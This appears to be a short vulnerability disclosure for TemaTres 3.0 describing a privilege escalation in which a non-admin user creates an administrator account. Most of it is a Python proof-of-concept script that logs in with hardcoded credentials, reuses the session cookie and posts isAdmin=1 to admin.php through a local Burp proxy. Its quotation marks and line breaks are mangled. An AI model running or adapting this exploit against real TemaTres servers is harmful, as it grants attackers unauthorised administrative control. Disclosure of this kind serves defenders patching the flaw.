TemaTres: controlled vocabulary server 3.0— Escalation of Privileges
The next image shows a profile with administration privileges, there are two users created.
With another user without administration privileges, its possible add the parameters with necessary values to create an administrator user.
The next imagen shows how was possible create an administrator user sucessfully
Proof Of Concept
You can automatize the process using the next script:
import requests
import syssession = requests.Session()
http_proxy = “http://127.0.0.1:8080"
https_proxy = “https://127.0.0.1:8080"proxyDict = {
“http” : http_proxy,
“https” : https_proxy
}
url = ‘http://localhost/tematres/vocab/login.php'
values = {‘id_correo_electronico’: ‘pablo@tematres.com’,
‘id_password’: ‘admin’,
‘task’:’login’}r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()[‘PHPSESSID’]
print (cookie)
host = sys.argv[1]
user = input(‘[+]User:’)
lastname = input(‘[+]lastname:’)
password = input(‘[+]Password:’)
password2 = input(‘[+]Confirm Password:’)
email = input(‘[+]Email:’)if (password == password2):
#configure proxy burp
data = {
‘_nombre’:user,
‘_apellido’:lastname,
‘_correo_electronico’:email,
‘orga’:’bypassed’,
‘_clave’:password,
‘_confirmar_clave’:password2,
‘isAdmin’:1,
‘boton’:’Guardar’,
‘userTask’:’A’,
‘useactua’:’’}
headers= {
‘Cookie’: ‘PHPSESSID=’+cookie
}
request = session.post(host+’/vocab/admin.php’, data=data, headers=headers, proxies=proxyDict)
print(‘+ — — — — — — — — — — — — — — — — — — — — — — — — — +’)
print(‘Status Code:’+ str(request.status_code))
else:
print (‘Passwords dont match!!!’)